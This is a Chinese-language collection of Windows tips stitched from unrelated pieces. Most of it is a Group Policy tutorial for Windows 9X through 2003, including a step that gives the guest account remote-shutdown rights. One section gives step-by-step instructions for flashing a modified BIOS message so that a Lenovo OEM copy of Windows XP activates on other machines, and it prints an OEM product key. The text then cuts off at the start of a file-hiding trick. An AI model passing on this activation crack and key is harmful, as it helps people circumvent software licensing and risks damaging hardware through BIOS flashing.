4)Conf.adm:用于NetMeeting 设置。
在Windows 2000/XP/2003的组策略控制台中,可以多次添加"策略模板",而在Windows 9X下,则只允许当前打开一个策略模板。下面介绍使用策略模板的方法。首先在Windows 2000/XP/2003组策略控制台中使用如下:
首先运行"组策略"程序,然后选择"计算机配置"或者"用户配置"下的"管理模板",按下鼠标右键,在弹出的菜单中选择"添加/删除模板".
然后单击"添加"按钮,在弹出的对话框中选择相应的.adm文件。单击"打开"按钮,则在系统策略编辑器中打开选定的脚本文件,并等待用户执行。
返回到"组策略"编辑器主界面后,依次打开目录"本地计算机策略→用户配置→管理模板",再点击相应的目录树,就会看到我们新添加的管理模板所产生的配置项目了(为了便于本文后面的实例大家能一起动手操作,建议添加除默认模板文件的其它模板文件)。
再来看Windows 9X下的组策略编辑器。首先在组策略编辑器中的"文件"菜单中选择"关闭",以便将当前脚本关闭,然后再在"选项"菜单中选择"模板"
然后单击"打开模板"按钮,在弹出的对话框中选择相应的.adm文件并单击"打开"按钮,则在编辑器中打开选定的脚本文件并等待用户执行。
三、运行组策略
(一)Windows 9X策略编辑器
按操作系统的不同,策略编辑工具分为两种,一种为Windows 2000/XP/2003组策略管理控制台,它在系统安装时已经默认安装上了;另外一种就是Windows 9X的系统策略编辑器,它在系统安装时并不被安装,程序文件在Windows安装盘上的\tools\reskit\netadmin\poledit目录下,它包括Poledit.exe、Poledit.inf、Windows.adm等文件。
如果是Windows 9X系统通过下面的方法,则可以进行正规的安装过程。
1.在控制面板中,双击"添加/删除程序"图标,单击"安装Windows"标签,然后单击"从磁盘安装"选项。
2.在从磁盘安装对话框中,单击"浏览"按钮并指定Windows 9X安装光盘的tools\reskit\netadmin\poledit目录。
3.单击"确认"按钮,然后再次单击对话框中的"确认"按钮。
4.在从磁盘安装对话框中,选择"系统策略编辑器"和"组策略"复选框,然后单击"安装"按钮。
安装完成后,单击"运行"命令项,输入poledit,然后单击"确认"按钮,管理员可以以两种不同的方式使用系统策略编辑器:注册表方式和策略文件方式。
1.以注册表方式使用系统策略编辑器。在系统策略编辑器中的文件菜单中,单击打开注册表编辑器,然后双击相应的本地用户或本地计算机图标。这取决于要编辑注册表中的哪个部分。在使用注册表方式时,可以直接编辑本地或远程计算机的注册表。这样,所做的改变将立即反映出来。在做出修改之后,必须关机并重新启动计算机以使所做修改生效。
2.以策略文件方式使用系统策略编辑器。在系统策略编辑器中的文件菜单中,单击新建或打开来打开一个策略文件。在使用策略文件方式时,可以创建和修改用于其它计算机的系统策略文件(POL),在这种方式下,注册表被间接地修改。这项改变将在用户登录时策略文件被下载后反映出来。当以策略文件方式编辑设置值时,单击一个注册表选项,可以看到三种可能状态之一:选中、清除、变灰。每当选择一个选项时,将会循环显示下一个可能的状态,这与选择一个标准的复选框不同。标准的复选框只有选中或清除两个选项。
如果一个设置值需要附加信息,那么缺省用户属性对话框的底部将出现一个编辑控制。通常,如果选中了一个策略,而又不想强制使用它,应当清除该复选框来取消该策略。
(二)Windows 2000/XP/2003组策略控制台
如果是Windows 2000/XP/2003系统,那么系统默认已经安装了组策略程序,在"开始"菜单中,单击"运行"命令项,输入gpedit.msc并确定,即可运行程序
使用上面的方法,打开的组策略对象就是当前的计算机,而如果需要配置其他的计算机组策略对象的话,则需要将组策略作为独立的控制台管理程序来打开,具体步骤如下:
1)打开 Microsoft 管理控制台(可在"开始"菜单的"运行"对话框中直接输入MMC并回车,运行控制台程序)。
2)在"文件"菜单上,单击"添加/删除管理单元"。
3)在"独立"选项卡上,单击"添加"。
4)在"可用的独立管理单元"对话框中,单击"组策略",然后单击"添加"。
5)在"选择组策略对象"对话框中,单击"本地计算机"编辑本地计算机对象,或通过单击"浏览"查找所需的组策略对象。
6)单击"完成",单击"关闭",然后单击"确定"。组策略管理单元即打开要编辑的组策略对象。
对于不包含域的计算机系统来说,在上面第5步的界面中,只有"计算机"标签,而没有其他标签项目。
通过上面的方法,我们就可以使用Windows 2000/XP/2003组策略系统强大的网络配置功能,让管理员的工作更轻松和高效。
在上面我们介绍了Windows 9X下的策略编辑器配置项目有"选中、清除、变灰"三种状态,Windows 2000/XP/2003组策略管理控制台同样也有三种状态,只不过名字变了。它们分别是:已启用、未配置、已禁用。
四、"桌面"设置
Windows的桌面就像我们的办公桌一样,需要经常进行整理和清洁,而组策略就如同我们的贴身秘书,让桌面管理工作变得易如反掌。下面就让我们来看看几个实用的配置实例:
位置:"组策略控制台→用户配置→管理模板→桌面"
1.隐藏桌面的系统图标(Windows 2000/XP/2003)
虽然通过修改注册表的方式可以实现隐藏桌面上的系统图标的功能,但这样比较麻烦,也有一定的风险。而采用组策略配置的方法,可以方便快捷地达到此目的。
比如要隐藏桌面上的"网上邻居"和"Internet Explorer"图标,只要在右侧窗格中将"隐藏桌面上‘网上邻居'图标"和"隐藏桌面上的Internet Explorer图标"两个策略选项启用即可;如果隐藏桌面上的所有图标,只要将"隐藏和禁用桌面上的所有项目"启用即可;当启用了"删除桌面上的‘我的文档'图标"和"删除桌面上的‘我的电脑'图标"两个选项以后,"我的电脑"和"我的文档"图标将从你的电脑桌面上消失;同样如果要让"回收站"图标消失,只须将"从桌面删除回收站"策略项启用即可。
2.退出时不保存桌面设置(Windows 2000/XP/2003)
此策略可以防止用户保存对桌面的某些更改。如果你启用这个策略,用户仍然可以对桌面做更改,但有些更改,如图标的位置、任务栏的位置及大小,在用户注销后都无法保存,不过任务栏上的快捷方式总可以被保存。
在右侧窗格中将"退出时不保存设置"这个策略选项启用即可。
3.屏蔽"清理桌面向导"功能(Windows XP/2003)
"清理桌面向导"会每隔 60 天自动在用户的电脑上运行,以清除那些用户不经常使用或者从不使用的桌面图标。如果启用此策略设置,则可以屏蔽"清理桌面向导",如果你禁用或不配置此设置,"清理桌面向导"会按照默认设置每隔60天运行一次。
打开右侧窗格中的"删除清理桌面向导",根据需要设置策略选项即可。
4.启用/禁用"活动桌面"(Windows 2000/XP/2003)
"活动桌面"是Windows 98(及以后版本)或安装了IE 4.0的系统中自带的高级功能,最大的特点是可以设置各种图片格式的墙纸,甚至可以将网页作为墙纸显示。但出于对安全和性能的考虑,有时候我们需要禁用这一功能(并且禁止用户启用它),通过策略设置可以轻松达到这一要求。具体操作方法:打开右侧窗格中的"禁用活动桌面"并启用此策略。
提示:如果同时启用"启用 Active Desktop"设置和"禁用 Active Desktop"设置,则"禁用 Active Desktop"设置会被忽略。如果 "禁用 Active Desktop 和 Web 视图"设置(在"用户配置→管理模板→Windows组件→Windows资源管理器"中)被启用,Active Desktop 就会被禁用,并且这两个策略都会被忽略。
以上介绍了几个关于桌面的组策略配置项目,在"组策略控制台→用户配置→管理模板→桌面"下还有其他若干组策略配置项目,读者可根据需要进行配置,这里不再赘述。
五、个性化"任务栏"和"开始"菜单
显示了"任务栏"和"开始"菜单的有关组策略配置项目。下面我们来看具体的实例:
位置:"组策略控制台→用户配置→管理模板→任务栏和开始菜单"
1.给"开始"菜单减肥(Windows 2000/XP/2003)
如果觉得Windows的"开始"菜单太臃肿的话,可以将不需要的菜单项从"开始"菜单中删除。在组策略右侧窗格中,提供了"从开始菜单删除用户文件夹"、"删除到‘Windows Update'的访问和链接"、"从开始菜单删除公用程序组"、"从开始菜单中删除‘我的文档'图标"等多种组策略配置项目。你只要将不需要的菜单项所对应的策略启用即可。
2.保护好"任务栏"和"开始"菜单(Windows 2000/XP/2003)
如果你不想随意让他人更改"任务栏"和"开始"菜单的设置,你只要将组策略控制台右侧窗格中的"阻止更改‘任务栏和开始菜单'设置"和"阻止访问任务栏的上下文菜单"两个策略项启用即可。这样,当你用鼠标右键单击任务栏并单击"属性"时,系统会出现一个错误消息,且当鼠标右键单击任务栏及任务栏上的项目时,例如"开始"按钮、时钟和"任务栏"按钮,弹出菜单会隐藏。
3.禁止"注销"和"关机"(Windows 2000/XP/2003)
当计算机启动以后,如果你不希望这个用户再进行"关机"和"注销"操作,那么可将组策略控制台右侧窗格中的"删除开始菜单上的‘注销'"和"删除和阻止访问‘关机'命令"两个策略启用。
这个设置会从开始菜单删除"关机"选项,并禁用"Windows 任务管理器"对话框按"Ctrl+Alt+Del"会出现这个对话框中的"关机"选项 。另外需要注意的是,此设置虽然可防止用户用 Windows界面来关机,但无法防止用户用其他第三方工具程序来将 Windows 关闭。
提示:如果启用了"删除开始菜单上的‘注销'",则会从"开始菜单选项"删除"显示注销"项目。用户无法将"注销<用户名>"项目还原到开始菜单(只能通过手工修改注册表的方法)。这个设置只影响开始菜单,它不影响 "Windows 任务管理器"对话框上的"注销"项目(因此需要同时启用"删除和阻止访问‘关机'命令"),而且不妨碍用户用其它方法注销。
4.利用组策略保护个人文档隐私(Windows 2000/XP/2003)
Windows有个高级智能功能,即可以记录你曾经访问过的文件。虽然这个功能可以方便用户再次打开该文件,但出于安全和性能的考虑(例如不想让人知道自己浏览过哪些网页和打开过哪些文件),有时需要屏蔽此功能。利用组策略,只要在右侧窗格中将"不要保留最近打开文档的记录"和"退出时清除最近打开的文档的记录"两个策略启用即可。
另外需要注意的是,如果启用此策略设置但不启用"从开始菜单中删除文档菜单"策略设置,"文档"菜单还会出现在"开始"菜单上,但是该菜单为空菜单。如果启用此策略设置,后来又禁用它并将它设置为"未配置",则启用策略设置之前保存的文档快捷方式会重新出现在"文档"菜单和应用程序的"文件"菜单中。
六、IE设置手到擒来
微软的Internet Explorer让我们可以轻松地在互联网上遨游,但要想用好Internet Explorer,则必须将它配置好。在IE浏览器的"Internet选项"窗口中,提供了比较全面的设置选项(例如:"首页"、"临时文件夹"、"安全级别"和"分级审查"等项目),但部分高级功能没有提供,而通过组策略即可轻松实现这些功能。下面来看具体实例:
位置:"组策略控制台→用户配置→管理模板→Windows 组件→Internet Explorer(需添加inetres.adm模板文件)"
1.禁用"在新窗口中打开"菜单项(Windows 2000/XP/2003)
出于对安全的考虑,有时候我们有必要屏蔽IE的一些功能菜单,组策略提供了丰富的设置项目,比如禁用"另存为..."、"文件"、"新建"等。下面以"禁用‘在新窗口中打开'菜单项"为例介绍具体的设置方法。
打开"组策略控制台→用户配置→管理模板→Windows 组件→Internet Explorer→浏览器菜单",然后打开"禁用‘在新窗口中打开'菜单项"并设置为"启用"。启用该策略后,用户在某个链接上单击鼠标右键,然后单击"在新窗口中打开"时,该命令将不起作用。该策略可与"‘文件'菜单禁用‘新建'菜单项"一起使用,后者禁止用户通过单击"文件"菜单,指向"新建",然后单击"窗口"在新窗口中打开浏览器。
提示:启用该策略后,单击"在新窗口中打开"命令,将无法在新窗口中打开链接,系统会提示用户该命令无效,网页自动打开的窗口也全部被禁止,其实这样也可达到屏蔽弹出广告窗口的效果。
2.限制IE浏览器的保存功能(Windows 2000/XP/2003)
在使用IE浏览网页过程中,当遇到好的图片、文章等资源时可以使用"另存为"功能将它保存到本地硬盘中,当多人共用一台计算机时,为了保持硬盘的整洁,需要对浏览器的保存功能进行限制。那么如何才能实现呢?可以这样操作:打开"组策略控制台→用户配置→管理模板→Windows组件→Internet Explorer→浏览器菜单",然后将右侧窗格中的"‘文件'菜单:禁用‘另存为...'菜单项"、"‘文件'菜单:禁用另存为网页菜单项"、"‘查看'菜单:禁用‘源文件'菜单项"和"禁用上下文菜单"等策略项目全部启用即可。
如果不希望别人对IE浏览器的设置随意更改,可以将"‘工具'菜单:禁用‘Internet选项...'"策略启用。另外,根据个人的需要,在该窗格中还可以禁用其他项目。
3.禁用"Internet 选项"控制面板(Windows 2000/XP/2003)
上面提到了"禁用Internet选项"的功能,使用该功能可以达到阻止别人对IE随便设置的目的。而这种方法无法具体禁用Internet选项中的控制模板项目,因此给具体应用带来麻烦。通过下面的组策略设置方法,则可以实现这一要求:
打开"组策略控制台→用户配置→管理模板→Windows组件→Internet Explorer→Internet 控制面板",在右边窗格中我们可以看到"禁用常规页"、"禁用安全页"等组策略项目。下面以"禁用常规页"为例进行说明:打开右边窗格中的"禁用常规页"并设置为"启用"。然后我们再打开Internet选项控制面板,会发现"常规"项目已经没有了,这样一来用户将无法看到和更改主页、缓存、历史记录、网页外观以及辅助功能的设置,因为该策略将删除界面上的"常规"选项卡,所以如果设置了该策略,则无须设置位于 "用户配置→管理模板→Windows 组件→Internet Explorer"中的诸如"禁用更改主页设置"、"禁用更改颜色设置"等策略。
4.禁止修改IE浏览器的主页(Windows 2000/XP/2003)
如果不希望他人对自己设定的IE浏览器主页进行随意更改的话,可以打开"组策略控制台→用户配置→管理模板→Windows组件→Internet Explorer→工具栏",然后选择"禁用更改主页设置"组策略并启用即可。另外在这个窗格中,还提供了"更改历史记录设置"、"更改颜色设置"和"更改Internet临时文件设置"等项目的禁用功能。
启用此策略后,在IE浏览器的"Internet 选项"对话框中,其"常规"选项卡的"主页"区域的设置将变灰。
提示:如果设置了位于"组策略控制台→用户配置→管理模板→Windows组件→Internet Explorer→Internet Explorer控制面板"中的"禁用常规页"策略,则无须设置该策略,因为"禁用常规页"策略将删除界面上的"常规"选项卡。
5.自定义IE工具栏(Windows 2000/XP/2003)
IE工具栏的背景和上面的按钮都是可以自定义的,以前我们大多使用手动修改注册表的方法,不过并不直观,现在我们用"组策略"可以更方便地达到效果,打造属于我们自己的IE。
打开"组策略控制台→用户配置→Windows设置→Internet Explorer维护→浏览器用户界面"下的"浏览器工具栏按钮自定义"策略配置项目,在这里,可以自定义浏览器工具栏的背景图片,点击"浏览"选择一个BMP的位图文件即可(注意:工具栏背景应该与工具栏大小相同,而亮度应该足以显示黑色文字,否则实际效果并不理想)。
接下来,我们要在IE的工具栏上添加自己的快捷方式,比如添加"我的QQ",在这里也可以很轻松地完成。
点击"添加",在"工具栏标题"中输人"我的QQ",在"工具栏操作"中选择QQ程序的路径,最后再选择好"颜色图标"和"灰度图标"的路径(如果你不知道怎么提取这两个图标,可以请EXeScope这个软件来帮忙,在各大站点都可以下载)。设置完成后点"确定",再次打开IE后就可以看到修改的效果了。
七、轻松实现Windows高级功能
1.设置并锁定Windows Media Player外观(Windows 2000/XP/2003)
Windows Media Player是目前最流行的多媒体播放器之一,如果不希望其他用户随意更改其界面外观的话,利用组策略可以轻松实现。打开"组策略控制台→用户配置→管理模板→Windows 组件→Windows Media Player→用户界面中的设置并锁定外观"启用此策略。
启用此策略后,将使 Windows Media Player 只以指定的外观模式显示,具体可以使用在"策略"选项卡上的"外观"框中指定的外观。你必须为外观使用完整的文件名例如miniplayer.wmz。如果外观文件在用户的计算机上没有安装,播放器将以Windows Media Player外观打开。
提示:本策略设置软件版本至少为Windows Media Player v8.00,ADM文件为wmplayer.adm。
2.禁止Windows Media Player播放时运行屏保(Windows 2000/XP/2003)
屏幕保护程序可以有效地保护我们的显示器,但是当我们使用播放器观看精彩影片时,经常会出现屏幕保护程序突然运行而中断观看的尴尬局面。现在我们可以通过组策略来解决屏幕保护程序使Windows Media Player播放中断的麻烦问题了。打开"组策略控制台→用户配置→管理模板→Windows组件→Windows Media Player→播放中的允许运行屏幕保护程序"并将它设置为"已禁用"状态。
3.优化配置Windows Media Player网络缓冲(Windows 2000/XP/2003)
当我们使用Windows Media Player播放流式媒体时,播放器会在播放前对流式媒体进行缓冲处理,以便可以流畅地进行播放。在实际应用中,根据网络带宽和服务器的连接速度,缓存的时间长短并不一样,但Windows Media Player却是在使用同一设置,这无疑与实际网络情况不匹配,因此我们可以根据具体的网络带宽情况自己优化配置网络缓冲。打开"组策略控制台→用户配置→管理模板→Windows组件→Windows Media Player→网络中的配置网络缓冲"并设置为启用状态,在出现的缓冲时间(秒数)配置选项中,根据网络的带宽情况进行自定义(最多 60 秒)。
提示:如果此策略已启用,那么Windows Media Player"性能"选项卡上的缓存选项将不能再配置。
4.屏蔽使用所有 Windows Update 功能的访问(Windows 2000/XP/2003)
Windows Update可以自动连接Microsoft网站并下载更新内容,这对大部分用户来说是比较实用的,但对于不需要更新或者带宽紧张的电脑用户来说,此功能就显得多余了,而且经常传闻Windows Update会将计算机用户信息"秘密"发往Microsoft,因此也可以屏蔽这一"智能"高级功能。打开"组策略控制台→用户配置→管理模板→Windows 组件→Windows Update"中的"删除使用所有 Windows Update 功能的访问"组策略并启用此策略。
提示:如果你启用此设置,所有 Windows Update功能(其中包括阻止访问Windows Update网站http//windowsupdate.microsoft.com、开始菜单上的 Windows Update的超链接和Internet资源管理器上的工具菜单)将被删除。Windows自动更新也被禁用,你将不会收到有关更新的通知,也不会接到Windows Update的重要更新。此设置还会阻止设备管理器自动从Windows Update网站下载安装驱动程序的更新。
5.在Windows XP/2003中实现远程关机(Windows XP/2003)
在Windows XP/2003中,新增了一条命令行工具"shutdown",它可以关闭或重新启动本地或远程计算机。利用它,我们不但可以注销用户、关闭或重新启动计算机,还可以实现定时关机、远程关机。该命令的语法格式如下:
shutdown [-i |-l|-s |-r |-a][-f][-m[\\ComputerName]][-t xx][-c ″message″][-d[u][p]:xx:yy]
该命令具体的使用参数和技巧请参考Windows的帮助系统,帮助系统里面有全面的资料。我们现在简单地看一下该命令的一些基本用法:
1)注销当前用户
shutdown - l
该命令只能注销本机用户,对远程计算机不适用。
2)关闭本地计算机
shutdown - s
3)重启本地计算机
shutdown - r
4)定时关机
shutdown - s -t 30
指定在30秒之后自动关闭计算机。
5)中止计算机的关闭。有时我们设定了计算机定时关机后,如果出于某种原因又想取消这次关机操作,就可以用shutdown - a来中止。
在该命令的格式中,有一个参数[-m [\\ComputerName],用它可以指定将要关闭或重启的计算机名称,若省略的话则默认为对本机操作。你可以用以下命令来试一下:
shutdown -s -m \\Anyes-solon -t 30
在30秒内关闭计算机名为Anyes-solon(Anyes-solon为局域网内一台同样装有Windows XP/2003)的电脑。
该命令执行后,计算机Anyes-solon一点反应都没有,屏幕上却提示"Access is denied (拒绝访问)"。
出现这种情况是因为Windows XP默认的安全策略中,只有管理员组的用户才有权从远端关闭计算机,而一般情况下我们从局域网内的其他电脑访问该计算机时,则只有guest用户权限,所以当我们执行上述命令时,便会出现"拒绝访问"的情况。
而我们利用组策略即可赋予guest用户远程关机的权限。打开"组策略控制台→计算机配置→Windows 设置→安全设置→本地策略→用户权利指派中的从远端系统强制关机",在弹出的对话框中显示目前只有"Administrators"组的成员才有权从远程关机;单击对话框下方的"添加用户或组"按钮,然后在新弹出的对话框中输入"guest",再单击"确定"按钮。
通过上述操作后,我们便给计算机Anyes-solon的guest用户授予了远程关机的权限。以后,倘若你要远程关闭计算机Anyes-solon,只要在网络中其他装有Windows XP/2003的计算机中输入以下命令shutdown -s -m \\Anyes-solon -t 60即可。
这时,在Anyes-solon计算机的屏幕上将显示一个"系统关机"的对话框,在对话框下方还有一个计时器,显示离关机还有多少时间。在等待关机的时间里,用户还可以执行其他的任务,如关闭程序、打开文件等,但无法关闭该对话框,除非你用shutdown -a命令来中止关机任务。
八、用组策略提升系统性能
1.让Windows 的上网速率提升20%(Windows XP/2003)
默认情况下,Windows网络连接数据包调度程序将系统限制在80%的连接带宽之内,这对带宽较小的网络来说,无疑是笔不小的开支。我们可以通过组策略设置来替代默认值,让我们的上网速率提高20%!
打开"组策略控制台→计算机配置→管理模板→网络"中的"QoS数据包调度程序"并启用此策略,然后使用下面"带宽限制"框来调整系统可保留的带宽比例,将它设置为0%即可,然后按确定退出,之后我们就可以使用另外20%的带宽了。
2.关闭缩略图的缓存(Windows XP/2003)
Windows XP/20003系统具有缩略图视图功能,且为了加快那些被频繁浏览的缩略图显示速度,系统会将这些被显示过的图片进行缓存,以便下次打开时直接读取缓存中的信息,从而达到快速显示的目的。但如果我们不希望系统进行缓冲的话(比如只浏览一次的图片),则可以利用组策略关闭缩略图缓存的功能,这样第一次浏览速度反而会大大加快(因为不进行缓存处理)。
打开"组策略控制台→用户配置→管理模板→Windows组件→Windows资源管理器"中的"关闭缩略图的缓存"并启用此策略。
3.屏蔽系统自带的CD刻录功能(Windows XP/2003)
Windows XP/2003系统自带CD刻录功能,如果你有CD刻录机接在计算机上,Windows 资源管理器允许你制作并修改可重写式CD。但这样无疑会影响系统性能和资源管理器的执行速度,因此我们可以利用组策略来屏蔽此功能(大部分用户都使用专用的CD刻录软件)。
打开"组策略控制台→用户配置→管理模板→网络→"中的"删除CD刻录功能"并启用此策略。
4.关闭系统还原功能(Windows XP/2003)
系统还原是Windows XP/2003中集成的强大功能,它在系统运行的同时,备份那些被更改的文件和数据,如果出现问题,系统还原使用户能够在不丢失个人数据文件的情况下,将计算机还原到以前的状态。默认情况下,系统还原处于打开状态。
但为这一功能付出的代价也是相当大的,系统性能会明显下降,磁盘空间也会被占用很多。对于配置不高的计算机来说,强烈建议关闭此功能。
打开"组策略控制台→计算机配置→管理模板→系统→系统还原"中的"关闭系统还原"并启用此策略。启用此设置后即可关闭系统还原功能,并且不能访问"系统还原向导"和"配置界面"。
5.禁止Windows Messenger自动运行(Windows XP/2003)
在Windows系统中集成的优秀应用软件越来越多,但这些系统内置的软件都没有卸载选项,引起很多电脑用户的不满。比如Windows XP自带的Windows Messenger,不但卸载不方便而且还随系统一起自动运行。对于不上网的计算机用户或者根本就不用Windows Messenger的用户来说,当然要屏蔽此软件的自动运行功能。
打开"组策略控制台→计算机配置→管理模板→Windows组件→Windows Messenger"中的"不允许运行Windows Messenger "并启用此策略。
提示:这个设置出现在"计算机配置"和"用户配置"文件夹中。如果两个设置都配置,"计算机配置"中的设置比"用户配置"中的设置优先。
九、用组策略打造系统铜墙铁壁级功能
1.隐藏"我的电脑"中指定的驱动器(Windows XP/2003)
此组策略可以从"我的电脑"和"Windows 资源管理器"上删除代表所选硬件驱动器的图标。并且驱动器号代表的所有驱动器不出现在标准的打开对话框上。
打开"组策略控制台→用户配置→管理模板→Windows组件→Windows资源管理器"中的"隐藏‘我的电脑'中的这些指定的驱动器"并启用此策略,并在下面列表框中选择一个驱动器或几个驱动器。
提示:这项策略只删除驱动器图标。用户仍可通过使用其它方式继续访问驱动器的内容。同时这项策略不会防止用户使用程序访问这些驱动器或其内容。并且也不会防止用户使用磁盘管理即插即用来查看并更改驱动器特性。
2.防止从"我的电脑"访问驱动器(Windows 2000/XP/2003)
此策略让用户无法查看在"我的电脑"或"Windows 资源管理器"中所选驱动器的内容。同时它也禁止使用运行对话框、镜像网络驱动器对话框或Dir命令查看在这些驱动器上的目录。
打开"组策略控制台→用户配置→管理模板→Windows组件→Windows资源管理器"中的"防止从‘我的电脑'访问驱动器"并启用此策略,并在下面列表框中选择一个驱动器或几个驱动器。
提示:这些代表指定驱动器的图标仍旧会出现在"我的电脑"中,但是如果用户双击图标,会出现一条消息解释设置防止这一操作。同时这些设置不会防止用户使用其它程序访问本地和网络驱动器。并且不防止他们使用磁盘管理即插即用查看和更改驱动器特性。
3.禁止使用命令提示符(Windows 2000/XP/2003)
在Windows 2000/XP/2003下,我们可以运行cmd.exe进入命令提示符状态,并可以继续运行一些DOS命令和其他命令行程序。出于对安全的考虑,有些系统应该屏蔽此功能。
打开"组策略控制台→用户配置→管理模板→系统"中的"阻止访问命令提示符"并启用此策略,并在下面列表框中选择是否"也停用命令提示符脚本处理",这个设置还决定批处理文件 .cmd和.bat是否可以在计算机上运行。
如果启用这个设置,在用户试图打开命令窗口时,系统会显示一条消息,解释设置阻止这一操作。
4.禁止更改显示属性(Windows 2000/XP/2003)
选择"控制面板"中的"显示"或在Windows桌面的空白处单击右键选择"属性",可进入"显示设置"对话框,可以对桌面主题、桌面背景、屏保程序、显示设置等各项进行设置,如果你不想让别人随意更改各项设置,可以通过组策略将它隐藏起来。
打开"组策略控制台→用户配置→管理模板→控制面板→显示",然后可以看到隐藏桌面选项卡、隐藏主题选项卡、隐藏保护程序选项卡、隐藏设置选项卡等策略配置,可根据需要对这些项目进行配置。比如启用了"隐藏‘桌面'选项卡"策略后,再打开"显示属性"对话框,就看不到"桌面"标签了,这样自然就无法再对桌面属性进行更改了。
5.禁用注册表编辑器(Windows 2000/XP/2003)
为了防止他人进入电脑后对注册表文件进行修改,可以在组策略中对注册表编辑器做禁止访问设置。具体操作方法:打开"组策略控制台→用户配置→系统"中的"阻止访问注册表编辑工具"并启用此策略。
此策略被启用后,用户试图启动注册表编辑器(Regedit.exe 及 Regedt32.exe)的时候,系统会禁止这类操作并弹出警告消息。
6.彻底禁止访问"控制面板"(Windows 2000/XP/2003)
如果不希望其他用户访问计算机的"控制面板",同样可以使用组策略来实现。打开"组策略控制台→用户配置→管理模板→扩展面板"中的"禁止访问控制面板"并启用此策略。
此策略启用后可以防止"控制面板"程序文件(Control.exe)的启动。他人将无法启动"控制面板"(或运行任何"控制面板"项目)。另外,这个设置将从"开始"菜单中删除"控制面板"。同时这个设置还从"Windows资源管理器"中删除"控制面板"文件夹。
7.禁止建立新的拨号连接(Windows 2000/XP/2003)
如果不想让别人在计算机中建立新连接来拨号上网的话,组策略也可以做到。打开"组策略控制台→用户配置→管理模板→网络→网络连接"中的"禁止访问新建连接向导"并启用此策略。
启用此策略后,在"网络连接"文件夹和"开始菜单"中就不会出现"建立新连接"。
提示:此设置无法阻止用户使用诸如 Internet Explorer 这样的其它程序来绕过此设置。另外此设置必须重新启动计算机后才能生效。
8.禁用"添加/删除程序"(Windows 2000/XP/2003)
"控制面板"中"添加或删除程序"项目允许你安装、卸载、修复并添加和删除 Windows 的功能和组件以及种类很多的 Windows 程序。如果你想阻止其他用户安装或卸载程序,可利用组策略来实现。
打开"组策略控制台→用户配置→管理模板→控制面板→添加→删除程序"中的"删除‘添加/删除程序'程序"并启用此策略,当我们再打开"控制面板"中"添加/删除程序"模块的时候,会自动弹出警告窗口,而"添加/删除程序"则无法运行。
此外,在"添加/删除程序"分支中还可以对Windows"添加/删除程序"项中的"添加新程序"、"从CD-ROM或软盘添加程序"、"从Microsoft添加程序"、"从网络添加程序"等项进行隐藏,通过这些策略项目的设置,起到了保护计算机中系统文件及应用程序的作用。
9.限制使用应用程序(Windows 2000/XP/2003)
如果你的电脑设置了多个用户,有些程序我们可能不希望其他用户随意运行,也能在组策略中设置。
打开"组策略控制台→用户配置→管理模板→系统"中的"只运行许可的Windows应用程序"并启用此策略,然后点击下面的"允许的应用程序列表"边的"显示"按钮,弹出一个"显示内容"对话框,在此单击"添加"按钮来添加允许运行的应用程序即可。以后一般用户只能运行"允许的应用程序列表"中的程序
修改BIOS破解联想OEM WINXP的办法
用修改BIOS的工具修改BIOS的Message(也就是启动时的提示),AMI和Award的BIOS都可用!我自己的
电脑是AwardBIOS(6.0PG)的,用modbin6修改BIOS Message,在前面加入了"LEGEND Dragon",要注意大小写,没有两边的引号。安装联想的OEM XP成功。AMI的BIOS也行的,需要用AMI的修改工具,在http://www.mybios.net 有.修改后安装自动激活,这可是真正的激活呀!可以正常安装XP SP1简体中文版(不嫌麻烦的话可以上网
自动更新),一切正常,无任何问题!哈哈!
修改BIOS的方法:
用修改BIOS的工具修改BIOS的Message(也就是启动时的提示),AMI和Award的BIOS都可用!我自己的
电脑是AwardBIOS(6.0PG)的,用modbin6修改BIOS Message,在前面加入了"LEGEND Dragon",要注意大小写,没有两边的引号。安装联想的OEM XP成功。AMI的BIOS也行的,需要用AMI的修改工具,在http://www.mybios.net 有.修改后安装自动激活,这可是真正的激活呀!可以正常安装XP SP1简体中文版(不嫌麻烦的话可以上网自动更新),一切正常,无任何问题!哈哈!
这下子不用为XP激活发愁了!!!
Award BIOS修改的详细步骤:
所需文件:
1. awdflash.exe
http://202.102.9.113/bioshome/down/list.asp?id=489
2.modbin 两个版本 如果你的Award BIOS是4.x 版的就用modbin 如果是6.x版本就用modbin6 ,是什么版本,可以在开机启动时看出来!
modbin4 http://202.102.9.113/bioshome/down/list.asp?id=482
modbin6 http://202.102.9.113/bioshome/down/list.asp?id=484
具体过程:</p>
1. 进入纯DOS方式,不是Windows下的DOS窗口
2. 运行awdflash /sy 读出你主板上的BIOS存成awdbios.bin
3. 运行modbin awdbios.bin 或者modbin6 awdbios.bin
4. 选Change BIOS Message,然后在最前面加入"LEGEND Dragon"注意大小写,后面加以随便任意改
,但前面必须是"LEGEND Dragon",如果后面还要有内容,最好与Dragon之间空格!
例如我原来的BIOS Message是"J.663AS Ultra A07 12-14-2001"我就改成"LEGEND
Dragon J.663AS
Ultra A07 12-14-2001"就可以了。当然改成其他的也行,比如""LEGEND Dragon calfier@shark"什么的,回车确认后,按Alt-F选Save.
5. 运行awdflash awdbios.bin写入你的BIOS就可以了
修改过程可以在安装XP后再改,安装前改好也行,随你的便!我特意做过试验,把BIOS MESSAGE信息改
回去,它就提示还有30天的激活时间,再改成LEGEND Dragon,进入XP后就又激活了,再改回原来的,
又提示你需要激活 :)联想OEM版安装CD-KEY:FCDGH-QW3DJ-VBC6C-9BYTX-4GKQJ
注意问题:
1、修改后运行安装光盘中的一个INSTALL.EXE文件,会有"你的使用请求目前不被接受,本安装光盘仅
允许在联想(北京)有限公司生产的计算机系统上使用......"这样的提示,这种情况不碍事的,直接
在DOS下像其它XP安装光盘一样用WINNT命令安装就可以了!我想这个文件不只是检测BIOS中修改的那个
标志吧!
2、必须用原版的联想OEM安装光盘(文件),不然能出现什么问题就不敢说了!(像用破解激活的版本
安装的话,像别的破解版一样同样可以激活,但是否能够升SP1,且不出问题就不敢肯定了);、原版的
联想XP PRO版安装光盘(我的是这样的)下有一LEGEND目录,该目录下有一i386目录,这个目录就是XP的安装文件目录,共6503个文件,113个文件夹,容量共533,674,388字节,我想目录可以在刻盘过程中改变,但字节数如果是原版的话,一般不会变吧。
巧用文件合并隐藏秘密
作用是合并文件呢?
一般情况下,它主要用于合并相同类型的文件,比如将两个文本文件合并为一
个文本文件、将两个独立的MPEG视频文件合并为一个连续的视频文件等。那么,
如果用它合并两个不同类型的文件,结果会怎样呢?
笔者发现,巧妙地将一个文本文件合并到一个非文本文件中,可以实现隐藏秘密
的作用。一起来看看吧。
比如你有一段私人信息要隐藏起来,请先录入并保存为文本文件,假设保存为
